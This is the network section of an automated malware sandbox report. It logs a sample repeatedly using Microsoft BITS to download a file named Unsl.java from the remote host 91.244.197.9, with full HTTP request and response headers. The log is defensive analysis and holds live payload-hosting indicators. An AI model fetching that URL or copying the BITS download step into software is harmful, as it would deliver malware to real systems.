Home
Result
Report
Detail Analysis

Network Analysis

Download pcap

Hosts 2 DNS 0 TCP 2 UDP 6 HTTP(S) 4 ICMP 0 IRC 0 Suricata Snort

IP Address	Status	Action
164.124.101.2	Active	Moloch
91.244.197.9	Active	Moloch

Name	Response	Post-Analysis Lookup
No hosts contacted.

TCP Requests
- 192.168.56.102:49163 91.244.197.9:80
- 192.168.56.102:49164 91.244.197.9:80

UDP Requests

HEAD 200 http://91.244.197.9/new/Unsl.java

REQUEST

HEAD /new/Unsl.java HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 Host: 91.244.197.9

RESPONSE

HTTP/1.1 200 OK Date: Wed, 12 Jul 2023 23:57:10 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Last-Modified: Wed, 12 Jul 2023 09:21:50 GMT ETag: "49fdc-60046bee26afa" Accept-Ranges: bytes Content-Length: 303068 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/x-java-source

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://91.244.197.9/new/Unsl.java

REQUEST

GET /new/Unsl.java HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Wed, 12 Jul 2023 09:21:50 GMT User-Agent: Microsoft BITS/7.5 Host: 91.244.197.9

RESPONSE

HTTP/1.1 200 OK Date: Wed, 12 Jul 2023 23:57:10 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Last-Modified: Wed, 12 Jul 2023 09:21:50 GMT ETag: "49fdc-60046bee26afa" Accept-Ranges: bytes Content-Length: 303068 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/x-java-source

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

HEAD 200 http://91.244.197.9/new/Unsl.java

REQUEST

HEAD /new/Unsl.java HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 Host: 91.244.197.9

RESPONSE

HTTP/1.1 200 OK Date: Wed, 12 Jul 2023 23:57:17 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Last-Modified: Wed, 12 Jul 2023 09:21:50 GMT ETag: "49fdc-60046bee26afa" Accept-Ranges: bytes Content-Length: 303068 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/x-java-source

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://91.244.197.9/new/Unsl.java

REQUEST

GET /new/Unsl.java HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Wed, 12 Jul 2023 09:21:50 GMT User-Agent: Microsoft BITS/7.5 Host: 91.244.197.9

RESPONSE

HTTP/1.1 200 OK Date: Wed, 12 Jul 2023 23:57:17 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Last-Modified: Wed, 12 Jul 2023 09:21:50 GMT ETag: "49fdc-60046bee26afa" Accept-Ranges: bytes Content-Length: 303068 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/x-java-source

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts